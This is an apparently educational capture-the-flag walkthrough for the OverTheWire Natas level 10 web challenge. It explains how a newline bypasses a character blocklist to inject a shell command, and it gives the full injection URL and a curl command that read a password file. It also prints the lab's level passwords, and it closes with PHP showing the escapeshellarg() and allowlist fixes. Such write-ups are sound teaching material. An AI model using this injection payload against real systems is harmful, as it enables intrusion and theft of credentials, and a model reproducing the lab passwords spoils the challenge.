Overview

Field     Value
URL       http://natas10.natas.labs.overthewire.org
Username  natas10
Password  t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu
Same word-search page as Level 9, but with a filter added. The “View sourcecode” link shows what’s changed.

Hints

The source adds a preg_match check:
if(preg_match('/[;|&]/', $key)) {
    print "Input contains an illegal character!";
}
The characters ;, |, and & are blocked. These were used in the Level 9 solution. Are they the only characters that act as command separators in bash?
In bash, a newline character terminates a command exactly like ; does. URL-encoded, the newline (\n) is %0a, and the filter above does not check for it. Try injecting %0a between your grep arguments and a cat command.

Solution

1. Understand what's blocked

The filter catches ;, |, and & in the submitted value. The Level 9 payload (&& cat ...) would be caught.

2. Use newline as a separator

A URL-encoded newline (%0a) is not in the blocklist. Send the payload via the URL directly:
http://natas10.natas.labs.overthewire.org/?needle=key+dictionary.txt+%0a+cat+/etc/natas_webpass/natas11&submit=Search
The shell receives:
grep -i key dictionary.txt
cat /etc/natas_webpass/natas11

3. Read the output

The page renders the grep results followed by the contents of the password file.
Character blacklists are inherently fragile: newlines, null bytes, and other shell metacharacters are easy to overlook. The correct fix is escapeshellarg(), which quotes the entire argument so the shell treats it as a single literal word, or avoiding shell execution entirely. An allowlist (only permit alphanumerics) is more robust than any blocklist.
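The following PHP is an added example, not the Natas source: it places the level's blocklist check beside an escapeshellarg() version and an allowlist version, and runs the newline payload from this page through each so the difference is visible. Function names and the dictionary.txt path are assumed for illustration.

```php
<?php
// Added example (not the level's own code). Three ways of handling the search term.

// 1. The fragile blocklist from the level: it stops ; | & but not a newline,
//    so "key dictionary.txt\ncat ..." passes straight through.
function blocklist_says_safe(string $key): bool {
    return preg_match('/[;|&]/', $key) !== 1;   // true means "looks safe" (it is not)
}

// 2. escapeshellarg() wraps the whole value in single quotes and escapes any
//    embedded single quote, so the shell sees exactly one literal argument and
//    never interprets the newline as a command terminator.
function grep_escaped(string $key): string {
    return "grep -i " . escapeshellarg($key) . " dictionary.txt";
}

// 3. Allowlist: accept only what a search term legitimately needs and reject
//    everything else, instead of trying to enumerate bad characters.
function grep_allowlisted(string $key): ?string {
    if (!preg_match('/^[A-Za-z0-9]{1,32}$/', $key)) {
        return null;
    }
    return "grep -i " . escapeshellarg($key) . " dictionary.txt";
}

// Constructed input: the same payload the level uses (a literal newline).
$payload = "key dictionary.txt\ncat /etc/natas_webpass/natas11";

var_dump(blocklist_says_safe($payload));   // bool(true): the filter is bypassed

echo grep_escaped($payload), "\n";
// grep -i 'key dictionary.txt
// cat /etc/natas_webpass/natas11' dictionary.txt
// -> grep searches for that literal two-line string; no second command runs

var_dump(grep_allowlisted($payload));      // NULL: rejected outright
var_dump(grep_allowlisted("key"));         // string(30) "grep -i 'key' dictionary.txt"
```

Quoting alone (option 2) keeps the shell from seeing a second command, but the allowlist (option 3) also removes the need to reason about what the shell might do with an odd but quoted value.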

With curl

# $'...' is a bash ANSI-C quoted string — it interprets \n as a real newline
# --data-urlencode then percent-encodes it as %0a before sending
curl -s -u natas10:t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu -G \
  --data-urlencode $'needle=key dictionary.txt\ncat /etc/natas_webpass/natas11' \
  --data-urlencode "submit=Search" \
  http://natas10.natas.labs.overthewire.org/

Password

natas11: UJdqkK1pTu6VLt9UHWAgRZz6sVUZ3lEk